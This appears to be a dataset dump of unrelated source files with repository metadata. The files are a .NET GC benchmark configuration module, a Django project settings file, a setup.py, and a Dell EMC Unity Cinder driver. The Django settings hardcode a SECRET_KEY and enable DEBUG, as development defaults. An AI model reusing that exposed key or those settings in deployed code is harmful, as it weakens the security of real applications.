testKind: TestKind = TestKind.time
def to_map(self) -> Mapping[str, str]:
return {
"-tc": str(self.tc),
"-tagb": str(self.tagb),
"-tlgb": str(self.tlgb),
**(empty_mapping() if self.totalMins is None else {"totalMins": str(self.totalMins)}),
"-lohar": str(self.lohar),
"-sohsi": str(self.sohsi),
"-lohsi": str(self.lohsi),
"-pohsi": str(self.pohsi),
"-sohpi": str(self.sohpi),
"-lohpi": str(self.lohpi),
"-pohpi": str(self.pohpi),
"-sohfi": str(self.sohfi),
"-lohfi": str(self.lohfi),
"-pohfi": str(self.pohfi),
"-allocType": self.allocType.name,
"-testKind": self.testKind.name,
}
def to_seq(self) -> Sequence[str]:
return [x for pair in self.to_map().items() for x in pair]
def to_str(self) -> str:
return " ".join(self.to_seq())
@doc_field("executable", "Path or key into 'paths' from the BenchFile.\nDefaults to \"GCPerfSim\".")
@doc_field(
"arguments",
"Command line arguments to pass to the executable.\n"
"For GCPerfSim, you can also specify GCPerfSimArgs, "
"and it will be converted to a string for you.",
)
@doc_field("iteration_count", "Defaults to options.default_iteration_count")
@doc_field("min_seconds", "Defaults to options.default_min_seconds")
@doc_field("max_seconds", "Defaults to options.default_max_seconds")
@doc_field("only_configs", "Only run the test against configs with one of the specified names.")
@with_slots
@dataclass(frozen=True)
class Benchmark:
executable: Optional[str] = None
arguments: Optional[Union[str, GCPerfSimArgs]] = None
iteration_count: Optional[int] = None
min_seconds: Optional[float] = None
max_seconds: Optional[float] = None
only_configs: Optional[Sequence[str]] = None
@property
def arguments_list(self) -> Sequence[str]:
if self.arguments is None:
return ()
elif isinstance(self.arguments, str):
return self.arguments.split()
else:
return self.arguments.to_seq()
def get_argument(self, name: str) -> Optional[str]:
args = self.arguments_list
for i, arg in enumerate(args):
if arg == name:
return args[i + 1]
return None
@property
def get_executable(self) -> str:
return option_or(self.executable, "GCPerfSim")
def executable_and_arguments(self) -> str:
ex = self.get_executable
return ex if self.arguments is None else f"{ex} {self.arguments}"
def __post_init__(self) -> None:
assert self.iteration_count is None or self.iteration_count >= 1
@with_slots
@dataclass(frozen=True)
class BenchmarkAndName:
name: str
benchmark: Benchmark
class Architecture(Enum):
amd64 = 0
x86 = 1
arm64 = 2
arm32 = 3
class Bitness(Enum):
bit32 = 0
bit64 = 1
@property
def to_int(self) -> int:
return {Bitness.bit32: 32, Bitness.bit64: 64}[self]
@overrides
def __str__(self) -> str:
return f"{self.to_int}-bit"
# TODO:MOVE
def get_architecture_bitness(a: Architecture) -> Bitness:
return {
Architecture.amd64: Bitness.bit64,
Architecture.x86: Bitness.bit32,
Architecture.arm64: Bitness.bit64,
Architecture.arm32: Bitness.bit32,
}[a]
def get_this_machines_architecture() -> Architecture:
m = platform_machine()
if m in ("AMD64", "x86_64"):
return Architecture.amd64
elif m == "armv71":
return Architecture.arm64
else:
raise Exception(f"TODO: Fill in get_this_machines_architecture() for {m}")
@doc_field(
"self_contained",
"""
If this is set, benchmark executables should be self-contained.
Then core_root and repo_path should not be set.
""",
)
@doc_field(
"core_root",
"""
Path to a Core_Root directory built from coreclr.
(Does not need to still be located inside a coreclr repository.)
""",
)
@doc_field(
"exact_path",
"""
Path to the corerun executable.
Generally prefer 'core_root' to this.
""",
)
@doc_field(
"repo_path",
"""
Instead of specifying Core_Root, you could specify the path to the repository.
Core_Root will be the default location of a release build.
When running on a remote machine, the coreclr path must already exist on that machine.
It should be at the same path in every machine being tested.
Or, it may be a UNC path.
""",
)
@doc_field(
"commit_hash",
"""
Optional; git commit hash that Core_Root was built from.
On Windows, if SigCheck was installed,
the test runner will verify that CoreRun.exe was tagged with this hash.
On non-Windows this is just for information.
""",
)
@doc_field(
"architecture",
"""
On Windows, if SigCheck was installed, the test runner will verify that
CoreRun.exe has the correct bitness corresponding to this architecture.
On non-Windows this is just for information.
""",
)
@with_slots
@dataclass(frozen=True)
class CoreclrSpecifier:
self_contained: Optional[bool] = None
# Path to CORE_ROOT directory
core_root: Optional[Path] = None
# Repository path
repo_path: Optional[Path] = None
exact_path: Optional[Path] = None
commit_hash: Optional[str] = None
architecture: Optional[Architecture] = None
def __post_init__(self) -> None:
assert (
self.self_contained != False
), "Instead of setting self_contained: false, just don't specify it"
assert _exactly_one_of(
self.self_contained is not None,
self.repo_path is not None,
self.core_root is not None,
self.exact_path is not None,
), (
"In 'coreclr:', exactly one of "
"'self_contained', 'core_root', and 'repo_path' should be specified."
)
def get_architecture(self) -> Architecture:
return (
self.architecture if self.architecture is not None else get_this_machines_architecture()
)
def _exactly_one_of(a: bool, b: bool, c: bool, d: bool) -> bool:
return a + b + c + d == 1
@with_slots
@dataclass(frozen=True)
class CoreclrAndName:
name: str
coreclr: CoreclrSpecifier
@doc_field("name", "Name of the property we are testing different values for.")
@doc_field(
"default_values",
"Value that coreclr would use without an explicit config.\nKey is a coreclr name.",
)
@with_slots
@dataclass(frozen=True)
class ConfigsVaryBy:
name: str
default_values: Optional[Mapping[str, float]] = None
@with_slots
@dataclass(frozen=True)
class _MachinesFile:
machines: Sequence[str]
@with_slots
@dataclass(frozen=True)
class Machine:
name: str
@property
def is_this_machine(self) -> bool:
return self.name == get_hostname()
def get_this_machine() -> Machine:
return Machine(get_hostname())
MACHINE_DOC = """
The `--machine` argument can take multiple arguments like `name:machinea name:machineb`.
It can also take `file:C:/bench/machines.yaml`, where that file should look like:
machines:
- machinea
- machineb
Each name should be the name of a machine on your network.
"""
MAX_ITERATIONS_FOR_ANALYZE_DOC = """
Only analyze this many test iterations even when more are available.
This will speed up analysis.
"""
MAX_ITERATIONS_FOR_RUN_DOC = """
Only run at most this many iterations of a test,
even when 'default_iterations' or 'iterations' specifies a higher number.
If you do this, you'll have to specify '--max-iterations' again when analyzing the test results.
"""
def parse_machines_arg(machine_args: Optional[Sequence[str]]) -> Sequence[Machine]:
if machine_args is None:
return (get_this_machine(),)
def get_machines(m: str) -> Sequence[Machine]:
if m == "this":
return (get_this_machine(),)
file = try_remove_str_start(m, "file:")
if file is not None:
return [
Machine(m)
for m in load_yaml(_MachinesFile, get_existing_absolute_file_path(file)).machines
]
else:
return (Machine(remove_str_start(m, "name:")),)
return [x for m in machine_args for x in get_machines(m)]
@with_slots
@dataclass(frozen=True)
class SingleTestCombination:
machine: Machine
coreclr: CoreclrAndName
config: PartialConfigAndName
benchmark: BenchmarkAndName
@property
def machine_name(self) -> str:
return self.machine.name
@property
def coreclr_name(self) -> str:
return self.coreclr.name
@property
def config_name(self) -> str:
return self.config.name
@property
def benchmark_name(self) -> str:
return self.benchmark.name
@property
def name(self) -> str:
return (
f"{self.machine_name}__{self.coreclr_name}__{self.config_name}__{self.benchmark_name}"
)
@with_slots
@dataclass(frozen=True)
class TestRunStatus:
success: bool
# This will be missing if 'collect' was specified as 'none' in BenchOptions
trace_file_name: Optional[
str
] = None # File should be stored in the same directory as test status
process_args: Optional[str] = None
process_id: Optional[int] = None
process_name: Optional[str] = None
seconds_taken: Optional[float] = None
test: Optional[SingleTestCombination] = None
stdout: Optional[str] = None
# This will be missing if the test run was not GCPerfSim
gcperfsim_result: Optional[GCPerfSimResult] = None
def __post_init__(self) -> None:
if self.trace_file_name is not None:
# Process ID is mutually exclusive with Name and Args. If any of the
# latter are set, then the former should not be there, and viceversa.
assert any(
val is not None for val in [self.process_args, self.process_id, self.process_name]
), (
"Test status file must set process_id, process_name, or process_args"
" if trace_file_name is set."
)
if self.process_id is not None:
assert (
self.process_name is None and self.process_args is None
), "Process Name and Args should not be set if Process ID is given."
else:
assert (
self.process_id is None and self.process_name is None
), "'process_id' and 'process_name' have no effect without 'trace_file_name'."
def get_process_data_tuple(self) -> Sequence[str]:
return tuple(
f"{k}:{v}"
for k, v in {"name": self.process_name, "args": self.process_args}.items()
if v is not None
)
@with_slots
@dataclass(frozen=True)
class PartialTestCombination:
machine: Optional[Machine] = None
coreclr_and_name: Optional[CoreclrAndName] = None
config_and_name: Optional[PartialConfigAndName] = None
benchmark_and_name: Optional[BenchmarkAndName] = None
@property
def machine_name(self) -> Optional[str]:
return None if self.machine is None else self.machine.name
@property
def coreclr_name(self) -> Optional[str]:
return None if self.coreclr_and_name is None else self.coreclr_and_name.name
@property
def config(self) -> Optional[Config]:
return None if self.config_and_name is None else self.config_and_name.config
@property
def config_name(self) -> Optional[str]:
return None if self.config_and_name is None else self.config_and_name.name
@property
def benchmark(self) -> Optional[Benchmark]:
return None if self.benchmark_and_name is None else self.benchmark_and_name.benchmark
@property
def benchmark_name(self) -> Optional[str]:
return None if self.benchmark_and_name is None else self.benchmark_and_name.name
@property
def name(self) -> str:
parts: Sequence[str] = (
*optional_to_iter(self.machine_name),
*optional_to_iter(self.coreclr_name),
*optional_to_iter(self.config_name),
*optional_to_iter(self.benchmark_name),
)
return "only test" if is_empty(parts) else "__".join(parts)
class Vary(Enum):
machine = 0
coreclr = 1
config = 2
benchmark = 3
VARY_DOC = """
Kind of thing we want to compare.
For example, if we vary coreclr, "
we'll show one diff for each combination of config and benchmark.
Defaults to the bench file's specified 'vary'.
"""
@doc_field("comment", "(ignored)")
@doc_field("vary", "Preferred property to vary when using `py . diff`")
@doc_field(
"configs_vary_by",
"""
This is mostly set just for information.
When there are many configs, this describes the one property that is changing.
""",
)
@doc_field("coreclrs", "Mapping from an (arbitrary) coreclr name to its specifier.")
@doc_field(
"paths",
"""
Mapping of shorthand names for paths.
If the 'executable' field of a Benchmark is a key in this mapping,
it will be replaced with the corresponding value.
""",
)
@doc_field("options", "Additional options that apply to every test.")
@doc_field(
"common_config",
"""
Config properties common to all configs.
Properties set here should not overlap with anything in 'configs'.
If omitted, the common config is empty.
""",
)
@doc_field(
"configs",
"""
Mapping from an (arbitrary) config name to the config.
Unlike coreclrs and benchmarks, this section is optional.
If omitted, common_config will be used.
""",
)
@doc_field("benchmarks", "Mapping from an (arbitrary) benchmark name to the benchmark.")
@doc_field("scores", "Mapping from an (arbitrary) score name to its specifier.")
@with_slots
@dataclass(frozen=True)
class BenchFile:
comment: Optional[str] = None
vary: Optional[Vary] = None
configs_vary_by: Optional[ConfigsVaryBy] = None
coreclrs: Mapping[str, CoreclrSpecifier] = empty_mapping()
paths: Optional[Mapping[str, Path]] = None # Maps name to path
options: BenchOptions = BenchOptions()
common_config: Optional[Config] = None
configs: Optional[Mapping[str, Config]] = None
benchmarks: Mapping[str, Benchmark] = empty_mapping()
scores: Optional[Mapping[str, ScoreSpec]] = None
def __post_init__(self) -> None:
assert not is_empty(self.coreclrs), "Benchfile must have at least one coreclr"
assert not is_empty(self.benchmarks), "Benchfile must have at least one benchmark"
assert self.configs is None or not is_empty(self.configs)
@property
def coreclrs_and_names(self) -> Sequence[CoreclrAndName]:
return [CoreclrAndName(k, v) for k, v in self.coreclrs.items()]
@property
def partial_configs_and_names(self) -> Sequence[PartialConfigAndName]:
if self.configs is None:
return (PartialConfigAndName("only_config", Config()),)
else:
return [PartialConfigAndName(k, v) for k, v in self.configs.items()]
@property
def full_configs_and_names(self) -> Sequence[FullConfigAndName]:
return [
FullConfigAndName(cn.name, combine_test_configs(self.common_config, cn.config))
for cn in self.partial_configs_and_names
]
@property
def benchmarks_and_names(self) -> Sequence[BenchmarkAndName]:
return [BenchmarkAndName(k, v) for k, v in self.benchmarks.items()]
@with_slots
@dataclass(frozen=True)
class BenchFileAndPath:
content: BenchFile
path: Path
def _split_unc_path(s: str) -> Tuple[str, str]:
unc_path = remove_str_start(s, "\\\\")
parts = unc_path.split("\\", maxsplit=1)
assert len(parts) == 2
return cast(Tuple[str, str], tuple(parts))
# machine=None means this machine
def change_path_machine(path: Path, machine: Machine) -> Path:
s = str(path)
if s.startswith("\\\\"):
# It's a UNC path -- replace the machine name
rest = _split_unc_path(s)[1]
if machine is None:
root = {OS.posix: "", OS.windows: "C:"}[get_os()]
else:
root = f"//{machine.name}"
return Path(f"{root}/{rest}")
elif machine.is_this_machine:
# Not changing machine
return path
elif s[1:].startswith(":\\"):
# Windows drive
if s[0] != "C":
raise Exception("TODO: Accessing a non-'C' drive via UNC path?")
rest = remove_str_start(s, "C:\\")
return Path(f"//{machine.name}/{rest}")
else:
raise Exception("TODO: UNC path to a non-windows path?")
def out_dir_for_bench_yaml(bench_file: Path, machine: Machine) -> Path:
return add_extension(change_path_machine(bench_file, machine), "out")
def parse_bench_file(path: Path) -> BenchFileAndPath:
return BenchFileAndPath(load_yaml(BenchFile, path), path)
ProcessQuery = Optional[Sequence[str]]
@with_slots
@dataclass(frozen=True)
class TestResult:
test_status_path: Optional[Path] = None
trace_path: Optional[Path] = None
process: ProcessQuery = None
def __post_init__(self) -> None:
if self.trace_path is None:
assert self.process is None
# Making sure this is a tuple because Python requires it to be hashable.
if self.process is not None:
assert isinstance(self.process, tuple)
assert self.test_status_path is not None or self.trace_path is not None
assert self.test_status_path is None or self.test_status_path.name.endswith(".yaml")
assert self.trace_path is None or is_trace_path(self.trace_path)
def load_test_status(self) -> Optional[TestRunStatus]:
return map_option(self.test_status_path, load_test_status)
@property
def trace_or_test_status_path(self) -> Path:
return non_null(option_or(self.trace_path, self.test_status_path))
@property
def test_status_or_trace_path(self) -> Path:
return non_null(option_or(self.test_status_path, self.trace_path))
def __str__(self) -> str:
return str(self.test_status_or_trace_path)
class TraceKind(Enum):
Etl_or_Btl = 0
Nettrace = 1
Perfcollect = 2
def is_trace_path(trace_path: Path) -> bool:
return _try_get_trace_kind(trace_path) is not None
def get_trace_kind(trace_path: Path) -> TraceKind:
kind = _try_get_trace_kind(trace_path)
assert kind is not None, f"Unexpected trace file {trace_path}"
return kind
def _try_get_trace_kind(trace_path: Path) -> Optional[TraceKind]:
name = trace_path.name.lower()
if name.endswith(".etl") or name.endswith(".btl"):
return TraceKind.Etl_or_Btl
elif name.endswith(".nettrace"):
return TraceKind.Nettrace
elif name.endswith(".trace.zip"):
return TraceKind.Perfcollect
else:
return None
def load_test_status(path: Path) -> TestRunStatus:
return load_yaml(TestRunStatus, path)
class TestPaths:
out_path_base: Path
def __init__(self, base: Path):
self.out_path_base = base
def add_ext(self, ext: str) -> Path:
return add_extension(self.out_path_base, ext)
@property
def test_status_path(self) -> Path:
return add_extension(self.out_path_base, "yaml")
def exists(self) -> bool:
return self.test_status_path.exists()
def load_test_status(self) -> TestRunStatus:
return load_yaml(TestRunStatus, self.test_status_path)
def to_test_result(self) -> TestResult:
return TestResult(
test_status_path=self.test_status_path,
trace_path=self.load_trace_file_path_if_success(),
)
def load_trace_file_path_if_success(self) -> Optional[Path]:
test_status = self.load_test_status()
if test_status.success and test_status.trace_file_name is not None:
return self.out_path_base.parent / test_status.trace_file_name
else:
return None
def trace_file_path(self, test_status: TestRunStatus) -> Optional[Path]:
return map_option(test_status.trace_file_name, lambda n: self.out_path_base.parent / n)
def write_test_status(self, test_status: TestRunStatus) -> None:
write_yaml_file(self.test_status_path, test_status)
@with_slots
@dataclass(frozen=True)
class SingleTestToRun:
bench_file: BenchFile
test: SingleTestCombination
iteration: int
# Running the test should write foo.etl, foo.yaml, and possibly others (e.g. log files)
out: TestPaths
@property
def coreclr_name(self) -> str:
return self.test.coreclr_name
@property
def coreclr(self) -> CoreclrSpecifier:
return self.test.coreclr.coreclr
@property
def config_name(self) -> str:
return self.test.config_name
@property
def config(self) -> TestConfigCombined:
return TestConfigCombined(self.test.config.config)
@property
def benchmark_name(self) -> str:
return self.test.benchmark_name
@property
def benchmark(self) -> Benchmark:
return self.test.benchmark.benchmark
def iter_test_combinations(
bench_file: BenchFile, machines: Sequence[Machine]
) -> Iterable[SingleTestCombination]:
for machine in machines:
for coreclr in bench_file.coreclrs_and_names:
for config in bench_file.partial_configs_and_names:
for benchmark in bench_file.benchmarks_and_names:
yield SingleTestCombination(machine, coreclr, config, benchmark)
def iter_tests_to_run(
bench: BenchFileAndPath,
machine: Machine,
max_iterations: Optional[int],
out_dir: Optional[Path],
) -> Iterable[SingleTestToRun]:
bench_file = bench.content
for t in iter_test_combinations(bench.content, (machine,)):
if (
t.benchmark.benchmark.only_configs is None
or t.config_name in t.benchmark.benchmark.only_configs
):
for i, out_paths in enumerate(
get_test_paths_for_each_iteration(bench, t, max_iterations, out_dir)
):
yield SingleTestToRun(
bench_file=bench_file,
test=SingleTestCombination(
machine=machine,
coreclr=t.coreclr,
config=PartialConfigAndName(
name=t.config_name,
config=combine_test_configs(
bench_file.common_config, t.config.config
).cfg,
),
benchmark=t.benchmark,
),
iteration=i,
out=out_paths,
)
def get_iteration_count(
bench: BenchFile, benchmark: Benchmark, max_iterations: Optional[int]
) -> int:
assert (
benchmark.iteration_count != 0
and bench.options.default_iteration_count != 0
and max_iterations != 0
)
i = option_or_3(benchmark.iteration_count, bench.options.default_iteration_count, 1)
return min(i, max_iterations) if max_iterations is not None else i
# Returns a TestPaths for each iteration
def get_test_paths_for_each_iteration(
bench: BenchFileAndPath,
t: SingleTestCombination,
max_iterations: Optional[int],
out_dir: Optional[Path] = None,
) -> Sequence[TestPaths]:
n_iters = get_iteration_count(bench.content, t.benchmark.benchmark, max_iterations)
return [get_test_path(bench, t, i, out_dir) for i in range(n_iters)]
def get_test_path(
bench: BenchFileAndPath,
t: SingleTestCombination,
iteration: int,
out_dir: Optional[Path] = None,
) -> TestPaths:
out = out_dir_for_bench_yaml(bench.path, t.machine) if out_dir is None else out_dir
return TestPaths(out / f"{t.coreclr.name}__{t.config.name}__{t.benchmark.name}__{iteration}")
def combine_test_configs(
common_config: Optional[Config], named_config: Config
) -> TestConfigCombined:
return TestConfigCombined(
combine_dataclasses_with_optional_fields(Config, named_config, common_config)
)
def get_coreclr(bench_file: BenchFile, coreclr_name: Optional[str]) -> CoreclrAndName:
return find_only_or_only_matching(
lambda cn: cn.name, "--coreclr", coreclr_name, bench_file.coreclrs_and_names
)
def get_config(bench_file: BenchFile, config_name: Optional[str]) -> FullConfigAndName:
return find_only_or_only_matching(
lambda cn: cn.name, "--config-name", config_name, bench_file.full_configs_and_names
)
def get_benchmark(bench_file: BenchFile, benchmark_name: Optional[str]) -> BenchmarkAndName:
return find_only_or_only_matching(
lambda bn: bn.name, "--benchmark-name", benchmark_name, bench_file.benchmarks_and_names
)
def try_find_benchfile_from_trace_file_path(path: Path) -> Optional[BenchFileAndPath]:
parent = path.parent
name = try_remove_str_end(parent.name, ".out")
if name is None:
return None
else:
assert name.endswith(".yaml")
bench_path = parent.parent / name
return parse_bench_file(parent.parent / name) if bench_path.exists() else None
| 31.515471
| 100
| 0.674729
|
2f6cfdca2157309f9f6e99240875b43502de7847
| 3,192
|
py
|
Python
|
profiles_project/settings.py
|
evansjethro/profiles-rest-api
|
ae07be9ce5d48f63a96afed772db71e4488664af
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
evansjethro/profiles-rest-api
|
ae07be9ce5d48f63a96afed772db71e4488664af
|
[
"MIT"
] | 4
|
2021-03-19T01:30:22.000Z
|
2021-06-10T18:49:13.000Z
|
profiles_project/settings.py
|
evansjethro/profiles-rest-api
|
ae07be9ce5d48f63a96afed772db71e4488664af
|
[
"MIT"
] | null | null | null |
"""
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@)bd3#a6y3n1zwzpwsu)_ps8t7@7w7v(y(61m@ka*tu!zftpg*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'profiles_api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| 25.741935
| 91
| 0.698308
|
35f4c2e254621d07c3b86b8a2565f9ce2ebde682
| 327
|
py
|
Python
|
setup.py
|
gsmadi/trinity-sentry-plugin
|
64f622eee97fe072240711cace13ff232565d2ff
|
[
"MIT"
] | null | null | null |
setup.py
|
gsmadi/trinity-sentry-plugin
|
64f622eee97fe072240711cace13ff232565d2ff
|
[
"MIT"
] | null | null | null |
setup.py
|
gsmadi/trinity-sentry-plugin
|
64f622eee97fe072240711cace13ff232565d2ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name='trinity-sentry-plugin',
version='0.1.0',
py_modules=['sentry_plugin'],
entry_points={
'trinity.plugins': 'sentry_plugin=sentry_plugin:SentryPlugin',
},
install_requires=[
'sentry-sdk==0.7.9'
]
)
| 21.8
| 70
| 0.620795
|
80c91c4b51a96e370a419f81acfe2ee024f7e31b
| 8,282
|
py
|
Python
|
cinder/volume/drivers/dell_emc/unity/driver.py
|
j-griffith/cinder
|
902719a46ed9b8f84f9753bd624ad59b5a968134
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/dell_emc/unity/driver.py
|
j-griffith/cinder
|
902719a46ed9b8f84f9753bd624ad59b5a968134
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/dell_emc/unity/driver.py
|
j-griffith/cinder
|
902719a46ed9b8f84f9753bd624ad59b5a968134
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Cinder Driver for Unity"""
from oslo_config import cfg
from oslo_log import log as logging
from cinder import interface
from cinder.volume import configuration
from cinder.volume import driver
from cinder.volume.drivers.dell_emc.unity import adapter
from cinder.volume.drivers.san.san import san_opts
from cinder.zonemanager import utils as zm_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
UNITY_OPTS = [
cfg.ListOpt('unity_storage_pool_names',
default=None,
help='A comma-separated list of storage pool names to be '
'used.'),
cfg.ListOpt('unity_io_ports',
default=None,
help='A comma-separated list of iSCSI or FC ports to be used. '
'Each port can be Unix-style glob expressions.')]
CONF.register_opts(UNITY_OPTS, group=configuration.SHARED_CONF_GROUP)
@interface.volumedriver
class UnityDriver(driver.ManageableVD,
driver.ManageableSnapshotsVD,
driver.BaseVD):
"""Unity Driver.
Version history:
1.0.0 - Initial version
2.0.0 - Add thin clone support
3.0.0 - Add IPv6 support
3.1.0 - Support revert to snapshot API
"""
VERSION = '03.01.00'
VENDOR = 'Dell EMC'
# ThirdPartySystems wiki page
CI_WIKI_NAME = "EMC_UNITY_CI"
def __init__(self, *args, **kwargs):
super(UnityDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(UNITY_OPTS)
self.configuration.append_config_values(san_opts)
protocol = self.configuration.storage_protocol
if protocol.lower() == adapter.PROTOCOL_FC.lower():
self.protocol = adapter.PROTOCOL_FC
self.adapter = adapter.FCAdapter(self.VERSION)
else:
self.protocol = adapter.PROTOCOL_ISCSI
self.adapter = adapter.ISCSIAdapter(self.VERSION)
def do_setup(self, context):
self.adapter.do_setup(self, self.configuration)
def check_for_setup_error(self):
pass
def create_volume(self, volume):
"""Creates a volume."""
return self.adapter.create_volume(volume)
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
return self.adapter.create_volume_from_snapshot(volume, snapshot)
def create_cloned_volume(self, volume, src_vref):
"""Creates a cloned volume."""
return self.adapter.create_cloned_volume(volume, src_vref)
def extend_volume(self, volume, new_size):
"""Extend a volume."""
self.adapter.extend_volume(volume, new_size)
def delete_volume(self, volume):
"""Deletes a volume."""
self.adapter.delete_volume(volume)
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
self.adapter.create_snapshot(snapshot)
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
self.adapter.delete_snapshot(snapshot)
def ensure_export(self, context, volume):
"""Driver entry point to get the export info for an existing volume."""
pass
def create_export(self, context, volume, connector):
"""Driver entry point to get the export info for a new volume."""
pass
def remove_export(self, context, volume):
"""Driver entry point to remove an export for a volume."""
pass
def check_for_export(self, context, volume_id):
"""Make sure volume is exported."""
pass
@zm_utils.add_fc_zone
def initialize_connection(self, volume, connector):
"""Initializes the connection and returns connection info.
Assign any created volume to a compute node/host so that it can be
used from that host.
The driver returns a driver_volume_type of 'fibre_channel'.
The target_wwn can be a single entry or a list of wwns that
correspond to the list of remote wwn(s) that will export the volume.
The initiator_target_map is a map that represents the remote wwn(s)
and a list of wwns which are visible to the remote wwn(s).
Example return values:
FC:
.. code-block:: json
{
'driver_volume_type': 'fibre_channel'
'data': {
'target_discovered': True,
'target_lun': 1,
'target_wwn': ['1234567890123', '0987654321321'],
'initiator_target_map': {
'1122334455667788': ['1234567890123',
'0987654321321']
}
}
}
iSCSI:
.. code-block:: json
{
'driver_volume_type': 'iscsi'
'data': {
'target_discovered': True,
'target_iqns': ['iqn.2010-10.org.openstack:volume-00001',
'iqn.2010-10.org.openstack:volume-00002'],
'target_portals': ['127.0.0.1:3260', '127.0.1.1:3260'],
'target_luns': [1, 1],
}
}
"""
return self.adapter.initialize_connection(volume, connector)
@zm_utils.remove_fc_zone
def terminate_connection(self, volume, connector, **kwargs):
"""Disallow connection from connector."""
return self.adapter.terminate_connection(volume, connector)
def get_volume_stats(self, refresh=False):
"""Get volume stats.
:param refresh: True to get updated data
"""
if refresh:
self.update_volume_stats()
return self._stats
def update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug("Updating volume stats.")
stats = self.adapter.update_volume_stats()
stats['driver_version'] = self.VERSION
stats['vendor_name'] = self.VENDOR
self._stats = stats
def manage_existing(self, volume, existing_ref):
"""Manages an existing LUN in the array.
:param volume: the mapping cinder volume of the Unity LUN.
:param existing_ref: the Unity LUN info.
"""
return self.adapter.manage_existing(volume, existing_ref)
def manage_existing_get_size(self, volume, existing_ref):
"""Returns size of volume to be managed by manage_existing."""
return self.adapter.manage_existing_get_size(volume, existing_ref)
def get_pool(self, volume):
"""Returns the pool name of a volume."""
return self.adapter.get_pool_name(volume)
def unmanage(self, volume):
"""Unmanages a volume."""
pass
def backup_use_temp_snapshot(self):
return True
def create_export_snapshot(self, context, snapshot, connector):
"""Creates the mount point of the snapshot for backup.
Not necessary to create on Unity.
"""
pass
def remove_export_snapshot(self, context, snapshot):
"""Deletes the mount point the snapshot for backup.
Not necessary to create on Unity.
"""
pass
def initialize_connection_snapshot(self, snapshot, connector, **kwargs):
return self.adapter.initialize_connection_snapshot(snapshot, connector)
def terminate_connection_snapshot(self, snapshot, connector, **kwargs):
return self.adapter.terminate_connection_snapshot(snapshot, connector)
def revert_to_snapshot(self, context, volume, snapshot):
"""Reverts a volume to a snapshot."""
return self.adapter.restore_snapshot(volume, snapshot)
| 34.22314
| 79
| 0.636923
|
a8932ec26cfa3a12800a3dba3021888658994583
| 3,638
|
py
|
Python
|
host/greatfet/glitchkit/usb.py
|
grvvy/greatfet
|
e8098307960a60e34c27ed2903f7abc2252b4cce
|
[
"BSD-3-Clause"
] | 328
|
2015-08-30T03:10:50.000Z
|
2022-03-31T12:47:48.000Z
|
host/greatfet/glitchkit/usb.py
|
grvvy/greatfet
|
e8098307960a60e34c27ed2903f7abc2252b4cce
|
[
"BSD-3-Clause"
] | 231
|
2017-02-11T23:21:31.000Z
|
2022-03-27T23:07:43.000Z
|
host/greatfet/glitchkit/usb.py
|
grvvy/greatfet
|
e8098307960a60e34c27ed2903f7abc2252b4cce
|
[
"BSD-3-Clause"
] | 94
|
2015-09-27T15:01:04.000Z
|
